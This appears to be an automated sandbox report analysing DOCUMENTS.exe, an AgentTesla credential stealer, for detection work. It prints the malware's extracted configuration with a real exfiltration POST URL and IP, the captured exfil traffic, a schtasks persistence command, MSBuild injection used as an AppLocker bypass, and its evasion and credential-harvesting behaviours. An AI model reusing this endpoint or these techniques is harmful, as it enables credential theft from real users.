Windows Analysis Report DOCUMENTS.exe

Overview

General Information

Sample Name: DOCUMENTS.exe
Analysis ID: 483808
MD5: f93324854461139c58e0e865ceb3c859
SHA1: 3deeda7cea856d0d45ee83aeb23e000101623c32
SHA256: aaac6d698326e6fbbcd64057fbf591ef97bf143494ede008d41ab75e5a37db5a
Tags: exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for dropped file
Installs a global keyboard hook
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Injects a PE file into a foreign processes
.NET source code contains very large strings
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • DOCUMENTS.exe (PID: 1864 cmdline: 'C:\Users\user\Desktop\DOCUMENTS.exe' MD5: F93324854461139C58E0E865CEB3C859)
    • schtasks.exe (PID: 4036 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ncXzBAPDBtn' /XML 'C:\Users\user\AppData\Local\Temp\tmp9BE9.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 2028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • MSBuild.exe (PID: 1488 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe MD5: 88BBB7610152B48C2B3879473B17857E)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "http://161.129.64.49/webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php", "User Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.294334493.000000000A8E8000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000000.00000002.294334493.000000000A8E8000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
00000009.00000002.525207312.00000000034F9000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000009.00000002.525207312.00000000034F9000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.293912263.000000000A721000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.DOCUMENTS.exe.a7c30b8.7.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0.2.DOCUMENTS.exe.a7c30b8.7.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
0.2.DOCUMENTS.exe.a7c30b8.7.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
0.2.DOCUMENTS.exe.a7c30b8.7.raw.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
9.2.MSBuild.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Possible Applocker Bypass
Source: Process started | Author: juju4 | Data: Command: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, ParentCommandLine: 'C:\Users\user\Desktop\DOCUMENTS.exe' , ParentImage: C:\Users\user\Desktop\DOCUMENTS.exe, ParentProcessId: 1864, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, ProcessId: 1488

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 0.2.DOCUMENTS.exe.a7c30b8.7.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Http", "HTTP method": "Post", "Post URL": "http://161.129.64.49/webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php", "User Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0"}
Multi AV Scanner detection for submitted file
Source: DOCUMENTS.exe | ReversingLabs: Detection: 17%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\ncXzBAPDBtn.exe | ReversingLabs: Detection: 17%
Source: 9.2.MSBuild.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: DOCUMENTS.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\DOCUMENTS.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
Source: DOCUMENTS.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Joe Sandbox View | ASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
Source: global traffic | HTTP traffic detected:
    POST /webpanel-dawn2/mawa/0fcd1ef3ebe94dad1463.php HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
    Content-Type: application/x-www-form-urlencoded
    Host: 161.129.64.49
    Content-Length: 458
    Expect: 100-continue
    Connection: Keep-Alive

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      Installs a global keyboard hook
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Window created: window name: CLIPBRDWNDCLASS

                      Spam, unwanted Advertisements and Ransom Demands:

                      Modifies the hosts file
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | File written: C:\Windows\System32\drivers\etc\hosts

                      System Summary:

                      Initial sample is a PE file and has a suspicious name
                      Source: initial sample | Static PE information: Filename: DOCUMENTS.exe
                      .NET source code contains very large strings
                      Source: DOCUMENTS.exe, Form1.cs | Long String: Length: 38272
                      Source: ncXzBAPDBtn.exe.0.dr, Form1.cs | Long String: Length: 38272
                      Source: 0.0.DOCUMENTS.exe.e30000.0.unpack, Form1.cs | Long String: Length: 38272
                      Source: 0.2.DOCUMENTS.exe.e30000.0.unpack, Form1.cs | Long String: Length: 38272
                      Source: DOCUMENTS.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe | Code function: 0_2_058A0D72 NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe | Code function: 0_2_058A0D41 NtQuerySystemInformation,
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Code function: 9_2_0122B0BA NtQuerySystemInformation,
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Code function: 9_2_0122B089 NtQuerySystemInformation,
                      Source: DOCUMENTS.exe | Binary or memory string: OriginalFilename vs DOCUMENTS.exe
                      Source: DOCUMENTS.exe, 00000000.00000002.292198643.00000000058C0000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameEnvoySinks.dll6 vs DOCUMENTS.exe
                      Source: DOCUMENTS.exe, 00000000.00000002.291041786.00000000046C1000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameCF_Secretaria.dll< vs DOCUMENTS.exe
                      Source: DOCUMENTS.exe, 00000000.00000000.250385953.0000000000E32000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameUnmanagedMemoryStre.exeh$ vs DOCUMENTS.exe
                      Source: DOCUMENTS.exe, 00000000.00000002.293912263.000000000A721000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameqJSTtDTISaCwBJDgVlmtSrlkDMdjFqgoqmoUWx.exe4 vs DOCUMENTS.exe
                      Source: DOCUMENTS.exe | Binary or memory string: OriginalFilenameUnmanagedMemoryStre.exeh$ vs DOCUMENTS.exe
                      Source: DOCUMENTS.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: ncXzBAPDBtn.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: DOCUMENTS.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: ncXzBAPDBtn.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: DOCUMENTS.exe | ReversingLabs: Detection: 17%
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe | File read: C:\Users\user\Desktop\DOCUMENTS.exe
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknown | Process created: C:\Users\user\Desktop\DOCUMENTS.exe 'C:\Users\user\Desktop\DOCUMENTS.exe'
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ncXzBAPDBtn' /XML 'C:\Users\user\AppData\Local\Temp\tmp9BE9.tmp'
                      Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe | Code function: 0_2_058A0BF6 AdjustTokenPrivileges,
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe | Code function: 0_2_058A0BBF AdjustTokenPrivileges,
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Code function: 9_2_0122AF3E AdjustTokenPrivileges,
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Code function: 9_2_0122AF07 AdjustTokenPrivileges,
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe | File created: C:\Users\user\AppData\Roaming\ncXzBAPDBtn.exe
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe | File created: C:\Users\user\AppData\Local\Temp\tmp9BE9.tmp
                      Source: classification engine | Classification label: mal100.troj.adwa.spyw.evad.winEXE@6/6@0/1
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe | Mutant created: \Sessions\1\BaseNamedObjects\RAjRPPJiBWcsEVV
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2028:120:WilError_01
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: DOCUMENTS.exe, Form1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: ncXzBAPDBtn.exe.0.dr, Form1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.0.DOCUMENTS.exe.e30000.0.unpack, Form1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.2.DOCUMENTS.exe.e30000.0.unpack, Form1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                      Source: DOCUMENTS.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: DOCUMENTS.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Data Obfuscation:

                      .NET source code contains potential unpacker
                      Source: DOCUMENTS.exe, Form1.cs | .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: ncXzBAPDBtn.exe.0.dr, Form1.cs | .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.DOCUMENTS.exe.e30000.0.unpack, Form1.cs | .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.2.DOCUMENTS.exe.e30000.0.unpack, Form1.cs | .Net Code: _X_X0FT_FT2 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe | Code function: 0_2_00E3297F push 20000001h; retf
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe | Code function: 0_2_016E30E9 pushfd ; ret
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe | Code function: 0_2_016E2EE5 push es; ret
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe | Code function: 0_2_016E2D42 push cs; ret
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe | Code function: 0_2_019ECD6C push ebx; iretd
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe | Code function: 0_2_019EA2D3 push ecx; retf
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Code function: 9_2_01222948 push cs; ret
                      Source: initial sample | Static PE information: section name: .text entropy: 7.54267894462
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe | File created: C:\Users\user\AppData\Roaming\ncXzBAPDBtn.exe

                      Boot Survival:

                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ncXzBAPDBtn' /XML 'C:\Users\user\AppData\Local\Temp\tmp9BE9.tmp'
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\DOCUMENTS.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe